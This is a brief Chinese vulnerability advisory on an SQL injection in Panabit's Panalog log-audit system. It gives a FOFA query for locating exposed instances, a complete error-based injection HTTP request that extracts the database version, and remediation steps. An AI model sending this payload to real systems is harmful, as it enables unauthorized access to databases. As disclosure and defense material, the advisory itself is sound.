0x01 產品簡介
Panalog大數據日志審計系統定位于將大數據產品應用于高校、 公安、 政企、 醫療、 金融、 能源等行業之中,針對網絡流量的信息進行日志留存,可對用戶上網行為進行審計,逐漸形成大數據采集、 大數據分析、 大數據整合的工作模式,為各種網絡用戶提供服務。
0x02 漏洞概述
Panabit /Maintain/sprog_deletevent.php 文件的 id 參數存在 SQL 注入漏洞,可導致數據庫信息泄露從而獲取敏感信息,甚至可能被攻擊者進一步利用造成更大危害。
0x03 復現環境
FOFA:app="Panabit-Panalog" && port="8012"
0x04 漏洞復現?
PoC
GET /Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(select+version%28%29)),0)&cloudip=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
查詢數據庫版本
0x05 修復建議?
對傳入的 sql 語句進行預編譯處理。
部署Web應用防火墻,對數據庫操作進行監控。
如非必要,禁止公網訪問該系統。